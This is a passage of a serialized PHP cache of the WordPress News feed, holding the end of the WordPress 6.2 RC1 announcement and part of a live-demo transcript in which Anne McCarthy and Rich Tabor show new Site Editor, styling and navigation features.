2023.</em></p>\n\n\n\n<p>Do you crave a deep dive into tech specs? These recent posts cover a few of the latest technical updates. This is not an exhaustive list, but it should get you started:&nbsp;</p>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/core/2023/03/07/patterns-api-expanded-to-include-template_types-property/\">Patterns API expanded to include template_types property</a></li>\n\n\n\n<li><a href=\"https://wp.me/p2AvED-qNP\">Introduction of Block Inspector Tabs</a></li>\n\n\n\n<li><a href=\"https://wp.me/p2AvED-qR8\">Shadows in Global Styles</a></li>\n\n\n\n<li><a href=\"https://wp.me/p2AvED-qME\">Introducing the HTML API</a></li>\n\n\n\n<li><a href=\"https://wp.me/p2AvED-qM4\">Miscellaneous Editor Changes</a></li>\n\n\n\n<li><a href=\"https://wp.me/p2AvED-qNm\">Custom CSS for global styles and per block</a>&nbsp;</li>\n\n\n\n<li><a href=\"https://wp.me/p2AvED-qLf\">Google Fonts are included locally in bundled themes</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2023/03/03/editor-components-updates-in-wordpress-6-2/\">Editor Components updates in WordPress 6.2</a></li>\n\n\n\n<li><a href=\"https://wp.me/p2AvED-qPp\">Enhanced accessibility</a></li>\n\n\n\n<li>And much, much more</li>\n</ul>\n\n\n\n<p>These are also compiled into a <a href=\"https://make.wordpress.org/core/2023/03/09/wordpress-6-2-field-guide/\">comprehensive WordPress 6.2 Field Guide</a>.&nbsp;&nbsp;</p>\n\n\n\n<h2 class=\"wp-block-heading\">Let&#8217;s go on a bug hunt!</h2>\n\n\n\n<p>Without your testing support, hitting important product milestones would be a much bigger challenge. It’s also a meaningful way to contribute to the project. If it’s your first time, or it’s been a while, <a href=\"https://make.wordpress.org/test/2023/02/07/help-test-wordpress-6-2/\">this detailed guide</a> is a great resource to lean on.&nbsp;</p>\n\n\n\n<p>From a global perspective, every time you test a pre-release version, you help secure the future of WordPress. How? By helping the community prove the software is stable, easy to use, and as bug-free as possible.&nbsp;</p>\n\n\n\n<p>Want to know more about testing releases in general? You can follow along with the <a href=\"https://make.wordpress.org/test/\">testing initiatives</a> that happen in Make Core. You can also join the <a href=\"https://wordpress.slack.com/messages/core-test/\">#core-test channel</a> on the <a href=\"https://wordpress.slack.com/\">Making WordPress Slack workspace</a>.</p>\n\n\n\n<p>If you think you have run into an issue, please report it to the <a href=\"https://wordpress.org/support/forum/alphabeta/\">Alpha/Beta area</a> in the support forums. If you are comfortable writing a reproducible bug report, you can <a href=\"https://core.trac.wordpress.org/newticket\">file one on WordPress Trac</a>. You can also check your issue against a list of <a href=\"https://core.trac.wordpress.org/tickets/major\">known bugs</a>.</p>\n\n\n\n<p>Interested in the details on the latest Gutenberg features? Find out what’s been included since WordPress 6.1 (the last major release of WordPress). You will find more details in these <em>What’s new in Gutenberg</em> posts for <a href=\"https://make.wordpress.org/core/2023/02/10/whats-new-in-gutenberg-15-0-18-january-2/\">15.1</a>, <a href=\"https://make.wordpress.org/core/2023/01/20/whats-new-in-gutenberg-15-0-18-january/\">15.0</a>, <a href=\"https://make.wordpress.org/core/2023/01/04/whats-new-in-gutenberg-14-9-4-january/\">14.9</a>, <a href=\"https://make.wordpress.org/core/2022/12/22/whats-new-in-gutenberg-14-8-21-december/\">14.8</a>, <a href=\"https://make.wordpress.org/core/2022/12/09/whats-new-in-gutenberg-14-7-7-december/\">14.7</a>, <a href=\"https://make.wordpress.org/core/2022/11/23/whats-new-in-gutenberg-14-6-23-november/\">14.6</a>, <a href=\"https://make.wordpress.org/core/2022/11/09/whats-new-in-gutenberg-14-5-9-november/\">14.5</a>, <a href=\"https://make.wordpress.org/core/2022/10/27/whats-new-in-gutenberg-14-4-26-october/\">14.4</a>, <a href=\"https://make.wordpress.org/core/2022/10/13/whats-new-in-gutenberg-14-3-12-october/\">14.3</a>, and <a href=\"https://make.wordpress.org/core/2022/09/30/whats-new-in-gutenberg-14-2-28-september/\">14.2</a>.</p>\n\n\n\n<h2 class=\"wp-block-heading\">A special thanks to WordPress plugin and theme developers</h2>\n\n\n\n<p>Do you build plugins and themes?&nbsp;Your products play a special role in helping WordPress do more things for more people across the world. In turn, more people in the WordPress Community mean a bigger, more robust open web.</p>\n\n\n\n<p>Chances are, you have already been testing your latest versions against the WordPress 6.2 betas. With RC1, you will want to finalize your testing and update the “<em>Tested up to”</em> version in your plugin’s readme file to 6.2.&nbsp;</p>\n\n\n\n<p>If you find compatibility problems, please post detailed information to the <a href=\"https://wordpress.org/support/forum/alphabeta/\">support forums</a>.</p>\n\n\n\n<h2 class=\"wp-block-heading\">Help translate WordPress</h2>\n\n\n\n<p>Do you speak a language other than English? ¿Español? Français? Português? Русский? 日本? <a href=\"https://translate.wordpress.org/projects/wp/dev\">Help translate WordPress into more than 100 languages.</a> This release also marks the <a href=\"https://make.wordpress.org/polyglots/handbook/glossary/#hard-freeze\">hard string freeze</a> point of the 6.2 release cycle.</p>\n\n\n\n<h2 class=\"wp-block-heading\">Hungry for even more?</h2>\n\n\n\n<p>Want to know more about what went into the making of WordPress 6.2? Please check out the <a href=\"https://make.wordpress.org/core/6-2/\">6.2 release cycle</a>, the <a href=\"https://make.wordpress.org/core/\">Make WordPress Core blog</a>, or search for <a href=\"https://make.wordpress.org/core/tag/6-2/\">all things 6.2 related</a>.&nbsp;</p>\n\n\n\n<h2 class=\"wp-block-heading\">Another haiku for 6.2—it’s tradition!&nbsp;</h2>\n\n\n\n<pre class=\"wp-block-verse\">Beta has left us<br>The code sings such happy songs<br>Six point two RC</pre>\n\n\n\n<p><em>Thank you to the following contributors for collaborating on this post: </em><a href=\"https://profiles.wordpress.org/laurlittle/\"><em>@laurlittle</em></a><em> </em><a href=\"https://profiles.wordpress.org/cbringmann/\"><em>@cbringmann</em></a><em>, <a href=\"https://profiles.wordpress.org/audrasjb/\">@audrasjb</a>, <a href=\"https://profiles.wordpress.org/jpantani/\">@jpantani</a>. Haiku by @<a href=\"https://github.com/nomad-skateboarding-dev\">nomad-skateboarding-dev</a></em>.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"14619\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:9;a:6:{s:4:\"data\";s:66:\"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n		\n\n					\n										\n					\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:26:\"Your WordPress 6.2 Preview\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:62:\"https://wordpress.org/news/2023/03/your-wordpress-6-2-preview/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 06 Mar 2023 17:11:38 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:4:{i:0;a:5:{s:4:\"data\";s:7:\"General\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:3:\"6.2\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:11:\"development\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:3;a:5:{s:4:\"data\";s:8:\"releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://wordpress.org/news/?p=14573\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:179:\"Watch this ‘live product demo’ recording with release squad members Anne McCarthy and Rich Tabor as they share exciting enhancements anticipated for the WordPress 6.2 release.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"Jonathan Pantani\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:67367:\"\n<p>On March 2, release squad members <a href=\"https://profiles.wordpress.org/annezazu/\">Anne McCarthy</a> and <a href=\"https://profiles.wordpress.org/richtabor/\">Rich Tabor</a> presented a live product demo of all the delights coming in WordPress 6.2, set to release on March 28, 2023.&nbsp;</p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-videopress wp-block-embed-videopress\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"VideoPress Video Player\" aria-label=\'VideoPress Video Player\' width=\'500\' height=\'315\' src=\'https://video.wordpress.com/embed/5nQlEknZ?at=31&amp;hd=1&amp;cover=1\' frameborder=\'0\' allowfullscreen allow=\'clipboard-write\'></iframe><script src=\'https://v0.wordpress.com/js/next/videopress-iframe.js?m=1674852142\'></script>\n</div></figure>\n\n\n\n<p>A first-of-its-kind event in the world of WordPress releases, the showcase was moderated by fellow community member <a href=\"https://profiles.wordpress.org/njwrigley/\">Nathan Wrigley</a> and joined by nearly 90 participants.&nbsp;</p>\n\n\n\n<p>During the demo, Anne and Rich highlighted some of the new features and enhancements that will continue to revolutionize the way you interact with WordPress. They gave a quick tour of the Site Editor’s refreshed interface, which lets you browse and preview templates before editing. They also covered all the new and highly anticipated ways to manage styles, as well as improvements to the Navigation block, new collections of header and footer patterns, the new distraction-free mode for focusing on writing, and plenty more.&nbsp;</p>\n\n\n\n<p>It was a jam-packed hour that sparked plenty of excitement—and a lively question and answer session that wrapped up the event on a high note. The presenters weren&#8217;t able to answer all the questions that were posed so they were <a href=\"https://a8c.slack.com/archives/C04S7RYK0F3/p1678330454722129?thread_ts=1678330090.320659&amp;cid=C04S7RYK0F3\">collected and answered in a follow-up post</a> on <a href=\"https://make.wordpress.org/core/\">Make.Wordpress.org/Core</a>.</p>\n\n\n\n<p>Watch the recording of the live demo in case you missed it, or want to relive the moment (and the funky fresh demo site designed by Rich). You can find a full transcript of the live demo below.&nbsp;</p>\n\n\n\n<h2 class=\"wp-block-heading\">Referenced Resources</h2>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/core/2023/02/2https://make.wordpress.org/core/2023/02/21/6-2-live-product-demo/%201/6-2-live-product-demo/\">Live demo announcement</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2023/02/06/roadmap-to-6-2/\">6.2 release roadmap</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2023/02/04/phase-2-finale/\">Wrapping Phase 2 of the Gutenberg project</a><strong>&nbsp;</strong></li>\n\n\n\n<li><a href=\"https://wordpress.org/news/2023/02/wordpress-6-2-beta-1/\">6.2 release enters Beta 1</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2023/03/01/wordpress-6-2-beta-4/\">Beta 4 and the latest call for testing</a></li>\n\n\n\n<li><a href=\"https://github.com/WordPress/gutenberg/issues/47043\">Fixed/sticky positioning GitHub issue</a></li>\n\n\n\n<li><a href=\"https://learn.wordpress.org/\">Learn WordPress</a></li>\n\n\n\n<li>FSE theme developers on Twitch: <a href=\"https://www.twitch.tv/daisyonwp\">daisyonwp</a> and <a href=\"https://www.twitch.tv/ryanwelchercodes\">ryanwelchercodes</a></li>\n\n\n\n<li><a href=\"https://developer.wordpress.org/news/2023/02/intrinsic-design-theming-and-rethinking-how-to-design-with-wordpress/\">Intrinsic design, theming, and rethinking how to design with WordPress</a></li>\n\n\n\n<li><a href=\"https://github.com/annezazu\">Anne McCarthy on GitHub</a></li>\n\n\n\n<li>Learn WP workshop: <a href=\"https://www.meetup.com/learn-wordpress-online-workshops/events/291813021/?isFirstPublish=true\">How to create a website on mobile</a></li>\n</ul>\n\n\n\n<p><em>Props to <a href=\'https://profiles.wordpress.org/cbringmann/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>cbringmann</a> and <a href=\'https://profiles.wordpress.org/laurlittle/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>laurlittle</a> for co-authoring and editing this post, <a href=\'https://profiles.wordpress.org/evarlese/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>evarlese</a>, <a href=\'https://profiles.wordpress.org/courtneypk/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>courtneypk</a>, and <a href=\'https://profiles.wordpress.org/mysweetcate/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>mysweetcate</a> for captioning, and <a href=\'https://profiles.wordpress.org/robinwpdeveloper/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>robinwpdeveloper</a> for uploading the recording files to wordpress.tv.</em></p>\n\n\n\n<h2 class=\"wp-block-heading\">Transcript</h2>\n\n\n\n<span id=\"more-14573\"></span>\n\n\n\n<pre class=\"wp-block-preformatted\"><strong>Nathan Wrigley </strong>0:22  <strong>\n</strong>How are we doing? Should we go for it?\n\n<strong>Anne McCarthy  </strong>0:24  <strong>\n</strong>I think we can start.\n\n<strong>Nathan Wrigley </strong> 0:26<strong> \n</strong>Why not? The recording has started. So let\'s get, let\'s get cracking.\n\nHello, welcome everybody to the WP 6.2 Live Demo outline. I\'m Nathan Wrigley. I do a few things around the WordPress community, mainly to do with video and podcasting and things like that. But it\'s not about me.\n\nToday, we\'ve got two fabulous guests. We\'ve got Anne McCarthy and Rich Tabor, and they\'re going to do a full on Product Demo. It\'s a little bit unlike things that you may have seen, because in the more recent past, lots of new features have been added. And so Rich, and Anne are going to spend the time on the screen in a moment, and they\'re going to show you all of the bits and pieces that you may find dropping into a WordPress install near you. Let\'s hope. There\'s been a lot that\'s been happening, so there really will be probably 20 or 30 minutes of live demos, so look forward to that. I\'ve got to get them to introduce themselves in a couple of moments.\n\nJust before that, though, a little bit of housekeeping. This is going to be recorded, so if you have to drop out halfway through and go elsewhere, completely fine. It\'s going to be posted at the Make/Core website, but it will also come fully complete with a transcript as well. So, if that\'s something that you\'re looking for, that will all be there. Also to say that if you want to post any questions, we\'d love that. In fact, there\'s a whole portion at the end when Rich and Anne have finished speaking, where we\'re going to field questions toward them. Now there\'s really two places to do that. If you\'re live with us on Zoom, then if you hit the Q&amp;A button at the bottom of the screen and post your questions in there, I guess specifity... specific... Whatever that word is, be specific. Help us out. Tell us exactly what you want to know and we\'ll get the questions to them. The other way to do that is to go into Slack. And there is a channel in there, #walkthrough. And if you want to post any questions in there as well, that would be great. So yeah, just to recap, Q&amp;A button if you\'re in Zoom, and use the Slack #walkthrough channel, if you are in the Making WordPress Slack. Okay, right. I think we\'ll take you guys one at a time if that\'s alright. First off a little bit of an introduction from both of you. Let\'s begin with with Anne McCarthy, shall we? Hello, Anne!\n\n<strong>Anne McCarthy  </strong>2:42<strong>\n</strong>Hello, hello. It\'s so good to be back on literally any sort of live stream with you.\n\nI appreciate that you\'re a part of this\n\n<strong>Nathan Wrigley </strong> 2:48<strong> \n</strong>Yeah, that\'s really nice.\n\n<strong>Anne McCarthy  </strong>2:49<strong>\n</strong>Well, I\'m Anne McCarthy. I\'m a product wrangler at Automattic. I live in Seattle. I also run the FSE Outreach Program, which is basically dedicated to testing all the latest and greatest of WordPress, which is part of why I\'m so excited to be part of this demo, is because so much neat stuff has come through this that I\'ve had the privilege of going through a little bit early on with the ever growing calls for testing. So that\'s a little bit about me, I\'ll pop it over to Rich.\n\n<strong>Nathan Wrigley  </strong>3:17<strong>\n</strong>Yeah. So Rich, if you want to take the baton there.\n\n<strong>Rich Tabor  </strong>3:21<strong>\n</strong>Yeah. Hey, everyone. I\'m Rich Tabor. I\'m a product manager at Automattic. And I work on WordPress and Gutenberg, in particular. From a little bit south of Atlanta, Georgia, in the US, and been building and tinkering with WordPress for I think, close to 11 years now. So it\'s, it\'s been a good run, and I\'m super stoked about where things are heading.\n\n<strong>Nathan Wrigley  </strong>3:43<strong>\n</strong>Yeah, and things definitely have been moving in a very much a forward direction, WordPress, 6.1. And WordPress 6.2. There\'s so much clear blue sky between the two of them. I think probably the best thing at this point is if we can have it, I don\'t know what whose screen is coming on. I think it might be Rich\'s, or maybe it\'s Anne\'s, I don\'t know.\n\n<strong>Rich Tabor  </strong>4:00<strong>\n</strong>Yeah.\n\n<strong>Nathan Wrigley  </strong>4:01<strong>\n</strong>If we can get that screen shared, then I will slide my way out of this call and say, Rich and Anne, it\'s... it\'s over to you. I\'ll be back soon as you\'re finished for any Q&amp;As.\n\n<strong>Anne McCarthy  </strong>4:14<strong>\n</strong>Awesome. Thank you.\n\n<strong>Rich Tabor  </strong>4:17<strong>\n</strong>Alright, everybody can see my screen right now?\n\n<strong>Anne McCarthy  </strong>4:19 <strong>\n</strong>Yes. Rich did an excellent job designing this. I do want to call this out that I love, absolutely love this.\n\n<strong>Rich Tabor  </strong>4:26<strong>\n</strong>Thanks, Anne. Yeah, this is actually running Twenty Twenty-Three. So it\'s kind of showcasing some of the things you can do just with the core theme. And some of the design tooling that we are, that has been built into 6.2. So this view here is the site editor. So I\'m going to orient you here. There\'s one big change here in particular, I want to call out visually, is this idea of the frame here on the right, and this will pull up the local template. So I\'m looking at my homepage of the site right now. If I navigate into other templates, I can pull those up here on the right as well. And then you can also navigate template parts. So this part\'s not very new to 6.2. But the idea of zooming in on different template parts and templates and having them appear here in the frame is. And that\'s important because of this concept of browse mode. And this is where you could dive into an actual page from the site editor. So here, I just pulled up the about page of the site, and I can click into it and actually start making changes. Now, the changes here within the post content block are going to be relative to this about page. But I can also modify the template which then changes the about, or changes the page on any instance of this particular template. So it\'s a new concept and how we can browse the site. But it\'s a very powerful, and really the first iteration of that way of managing a site.\n\n<strong>Anne McCarthy  </strong>5:50<strong>\n</strong>And also lightly introduced content editing in the site editor, as you mentioned. So it\'s a kind of a neat merging of the two worlds, which I know folks have long been wanting to see that unified. And same with the frame, it kind of adds a nice layer where instead of just being dropped in, like before, you kind of are given a more zoomed out view, which I think helps address a lot of the feedback that we saw around the orientation when you\'re entering the site editor.\n\n<strong>Rich Tabor  </strong>6:12 <strong>\n</strong>Yeah, exactly. And really, if we think a little bit further out than 6.2, this could also house setting to use. So we do have, you know, one view here that that is relative to 6.1, where you can see all of your different templates. But imagine if we had any other different types of settings and controls and different pages loaded within here, doesn\'t have to be just the front end templates and renders of your site.\n\nAlright, so we\'re gonna dive into this here. So you can go into it just by clicking on the frame. I\'ll do that one more time just to show, you just click on it. And now you entered right into it. You can edit it right off, so we can make changes, just as if we zoomed into it in the other way in 6.1. And then we have a bunch of styling tools that have been added to 6.2, so I want to kind of hone in on these. Like, this panel itself is not new. We have style variations, you can zoom in here, we\'ve got this new zoomed out view, where you can apply different ones at a time. And then we also have this icon here, which triggers the style book. Now the style book is a very interesting tool here that really lets you customize the theme\'s style guide, essentially. So I can go through each of these tabs, which are relative to the block categories, and see all of the blocks loaded on this particular site. So right here, I\'ve got like Button blocks and Columns block and whatnot. So if I click on one of these, it\'ll pull up the Style panel of that particular block. And then when I make changes over here, these are applied globally throughout my entire site. So if I want to change the way this button looks, let\'s say we do some smaller tags, maybe we\'ll add a little bit of letter spacing, and maybe make it capitalized. See, it\'s getting applied everywhere that the button is used. Also do some changes here to padding, perhaps. We\'ll do something custom here. I think that looks nice. And now...\n\n<strong>Anne McCarthy </strong> 8:13\nReal quick while you\'re doing this, I wanted to note that like this is something that folks have really struggled with previously with the site editor, where if you\'re editing a block that isn\'t in the template already, you\'re not able to see this. So as Rich is showing, you can actually look at any block that\'s being used in your theme and see how the change that you\'re making in styles will impact that. Where before, if the block wasn\'t present in that template that you were editing, it was hard to know exactly what was happening. And so now you have both the style book and this inline preview that you see in the Style section to rely upon, which is pretty neat.\n\n<strong>Rich Tabor</strong>  8:43\nYeah, exactly. And really, you could theoretically go in and design your entire theme with the style book. Now, I know there\'s some advantage to design in context of pages and whatnot. And I\'ll go into that in a bit. But the idea is that you really can quickly browse through all of the different blocks and tighten up what you want to within these controls. And it\'s not limited to the standard variation as well. There\'s also these style variations of each block that you can now manipulate as well. So we\'re gonna go in, say, we\'ll change the radius of this one. So we want it to be sharp like our other button. But we have these new controls. Like, this is a shadow control we\'ve added in 6.2, where you can apply, say, like this shadow here might be nice. This one here, and so some fallback shadows, within core that a theme can provide as well, its own values. But this now will apply for every single variation of the outline on my site here.\n\n<strong>Anne McCarthy  </strong>9:39 \nAnd you\'ll notice that it\'s not in the style book right now. And that\'s just part of the future feature development is showing the variations of blocks as well.\n\n<strong>Rich Tabor </strong> 9:47\nExactly, yes, I would imagine that this would this would show up the variations of the button block, yeah. Which is a nice way to really customize these, like it used to be only CSS would be used to manipulate these variations here. And now it kind of abstracts that away and you can do it within the editing experience. That\'s really nice. It really is. There\'s also this idea of block CSS, so you can add custom CSS that is scoped to a particular block. So if I add CSS here, it\'ll be applied for the button block wherever it\'s used. Now, I wouldn\'t recommend using additional CSS in most cases. I would, I would suggest using all the different controls that we\'ve built, that are built into 6.2. But the idea of using CSS to add a little pizzazz to this particular button block is fine. But just with that caveat that you wouldn\'t want to use it exclusively. Like I wouldn\'t apply a background color via CSS, I would rather use the background elements color here. There\'s also additional CSS, which emulates what was previously in the customizer. So we do have site wide CSS that can be applied within the site editor and also on the front end of your site. Again, I wouldn\'t emphasize using this exclusively, as there are a lot of new design tools that I would explore first, from the top level styles here where you can apply colors to the background, text and buttons. But if there was anything extra you wanted to add, you could do so within the stylesheet here.\n\n<strong>Anne McCarthy </strong> 11:21\nAnd I\'ll note we\'d love to hear feedback if there are certain things that you\'re repeatedly adding custom CSS for. So either commenting on a currently open issue, or if you don\'t find one, opening an issue would be super helpful, because it\'s neat to see what folks are using for CSS so we can fill those gaps.\n\n<strong>Rich Tabor </strong> 11:36\nYeah, exactly. So that\'s the global Style panel here. But there are some quite a few other improvements along with styling. So the first is the idea of pushing styles globally. So if I\'m in here, and I\'m designing, let\'s say I want to add a radius, I want to do some different typography as to appearance like this, like bold, italic look. And then we\'ll also...\n\n<strong>Anne McCarthy  </strong>12:07\nThat\'s cool.\n\n<strong>Rich Tabor  </strong>12:07\nThanks. Also, let me make the letter spacing, maybe we\'ll make it a little bit bigger, actually, and then, I think that\'ll work. Do these changes here and see I\'ve just styled this one particular block this button up here. And this button down here is still using the global styles that we designed earlier. But now I can go through my settings panel here and hit Apply globally. And I\'m going to here so we can see that happen. The styles are now pushed globally to all the other blocks. So this is really helpful for when you\'re designing in flow. And you don\'t necessarily want to abstract out into the style book and you want to push your changes that you just did here, because you like the way the button looks and want those applied everywhere, all at once. I think this is really powerful way to to quickly design within the editor. Another tool that is quite useful, I\'m going to take this heading here and manipulate this. It\'s the idea of copying and pasting styling. So we\'re going to use that same bold italic look, maybe we\'ll make that a little smaller, we can even manipulate this size to be a little bigger. Now we go here to copy styles. And then I can come all the way down here to this other heading that\'s very similar, and paste it in. And there we have that style applied just to these two headers. And you would do this when you don\'t necessarily want every single heading to have this effect. But perhaps there are like elements on this page that you want to push those changes to, specifically. So copying and pasting allows you to be very granular, whereas applying styling globally, lets you be more of a holistic design experience for pushing styles. Another neat...\n\n<strong>Anne McCarthy  </strong>13:57 \nOh, real quick, I just wanted to know like I think one of the things that\'s interesting is, as we\'ve added more design options to blocks like this is part of the experience of scaling things and making it easier to use. So when we think about like intuitive and delightful. Some of these tools coming into 6.2 really take you know, the tons of design tools that we\'ve added over the last couple releases and makes it easy so you can actually tweak things and then reuse. So I think that\'s one of the things I want to call out is it\'s kind of this crescendo. Where now the tools that are coming to 6.2 to really ease the experience and allow you to do a lot of neat stuff where rather than having to re-tweak everything through every single heading block. A lot of stuff is used. So...\n\n<strong>Rich Tabor  </strong>14:34\nYeah, exactly. WordPress is moving towards a design tool and less of like, what you see is what you can only have. It\'s more of an expression of creativity and it really does open up the doors for for designing beautiful pages on the web. I think it\'s really powerful.\n\nAnother cool bit that we\'ve added is the idea of sticky positioning. So headers would be nice sometimes if they stick to the top, so for top level group blocks, this is a group block here, there\'s this new position attribute where you can assign it to sticky. And as you can see, right in the editor, it\'s already showing me that this is sticky on the front end. And also here as well. It\'s only available for top level blocks for now, there\'s still some some odd stuff to figure out on how we communicate when something is not going to stick due to the the parent height of the elements around it. But for top level, it\'s still fine. So we have it here. But there are some iterations that are already happening for the next release that will kind of bring this into more, bring some more capabilities to this particular feature.\n\n<strong>Anne McCarthy  </strong>15:44 \nYeah, and I\'m very excited because one of the things I wanted to briefly call out was the how the header, the template part has that purple. So another neat thing coming to this release, that was a big part of feedback for the outreach program was having to look parts and reusable blocks having a different coloring, because there are different kinds of blocks are synced across the site, when you make little changes and impacts everything everywhere. So that\'s another neat thing that\'s coming with this release, is that you can kind of see those a bit differently in the List view as well as when you\'re in the editor. I see Nathan has his hand raised. Is that intentional? Oh, it\'s removed. Okay.\n\n<strong>Nathan Wrigley </strong> 16:23 \nIt was not intentional. That\'s my mistake. I\'m sorry.\n\n<strong>Rich Tabor </strong> 16:28 \nYeah, it helps you see quickly too like, what is the template part, particularly for headers and footers, it makes it easier to browse quickly.\n\nSo speaking of template parts, and patterns in particular, so headers and footers, are new patterns added within WordPress 6.2. And now that they\'re loaded, actually from the pattern directory, which is kind of neat. And I\'m going to show you how to replace a footer with one of those other patterns. So if you have your footer template parts selected, you can go to replace footer. Now this flow is not new to 6.2, but it\'s going to call out these other improvements. And then you just click one there, and you have it loaded here, that\'s the site logo that I\'m using up here as well. And you can modify this text without having to do any any funky PHP filters or moving actual templates. And if you want to change it again, you go back to replace say, let\'s pick this other one, let\'s try this one. It\'s kind of nice. And there\'s this focus view, or you can zoom in to just the footer itself. You can even check the responsiveness of it and see how it, how it reacts on mobile, and make any of your changes here and have those persist over to the actual template whenever you close it out. It\'s a nice way to really kind of clean up the editing experience. So you\'re not seeing this entire group of groups and instead kind of focusing on what you\'re actually wanting to complete. You can do the same for the header as well.\n\n<strong>Anne McCarthy  </strong>18:01\nYeah, and as Rich mentioned, there are some new patterns that are being bundled from the directory, which I think are really extensive. Regardless of what theme you\'re using, there\'s going to be some pattern for group patterns that help democratize design where you can use them in anything.\n\n<strong>Rich Tabor  </strong>18:15\nYes, that\'s right. All right. So navigation. Navigation has gone under a... quite a bit of work in the last a couple of months. And really, this is all about trying to make it easier to manage your site\'s navigation and also add pages and links and then even styling. So there\'s this new dedicated list view for the navigation block. So it\'s essentially emulating a little bit of what\'s available over here except for you had to kind of get down to it. Now it brings it top of mine and the surface area here. You can drag them around, move them up and down, even add submenu links and remove them as well. And then you can style it like normal. And now apply different styles via the styles tab to the block itself, or even individual page links and whatnot, you can dive into them and manage them all from here, instead of having to only manage them from up here. This really kind of abstracts the complexity from from this particular canvas interface into a more familiar interface here on the sidebar. It\'s really a great effort. And it\'s it\'s taken some time to refine but it\'s getting there and it\'s feels a lot nicer.\n\n<strong>Anne McCarthy  </strong>19:30 \nYeah, there\'s been a lot of good feedback about this as well just because it kind of is meant to marry the classic experience with bringing blocks into it. So it is in addition to being edit, editing on canvas, so if you really want to continue to edit as a block you still, you can continue to do that. But it does add a nice interface and the block settings where you\'re able to do it. And I\'ll briefly call out here the split settings, which we\'ll probably talk about later. But you\'ll see here for more complex blocks, there\'s some nice split settings making it a little bit easier, more intuitive to go through.\n\n<strong>Rich Tabor </strong> 20:02\nYeah, that\'s right. And if you take a look at navigation here, this is very similar to this component added here. And, and that\'s, that\'s purposeful, we want it to look and feel familiar. Either way you\'re managing navigation. So you can also add some menu items here, remove them and drag them around and reset them here, as well as browse into the individual pages. So that\'s what I have for the site editor portion of the demo. And did you have anything else you wanted to add to this, Anne?\n\n<strong>Anne McCarthy  </strong>20:37\nOh, could you resize the Browse mode for me? I just love the resizing. I think it\'s kind of cool. This is just like a fun, you know, thing to call out. But maybe you won\'t noticem but you can resize it. So as you\'re quickly going through your site, if you want to see how it looks in different ways, you can also do that. So that\'s the final thing I\'ll shout out.\n\n<strong>Rich Tabor  </strong>20:56\nYeah. So then, yeah, exactly. It\'s... there\'s a lot of fine, fine touches like that. Well, we can\'t obviously can\'t call them all out today. But it is really getting tightened up overall as an admin experience for the site.\n\n<strong>Anne McCarthy  </strong>21:12\nIt\'s such a great foundation in the future, for sure.\n\n<strong>Rich Tabor </strong> 21:15\nExactly, exactly. Alright, so if we press this back button here, it goes right back to the dashboard, 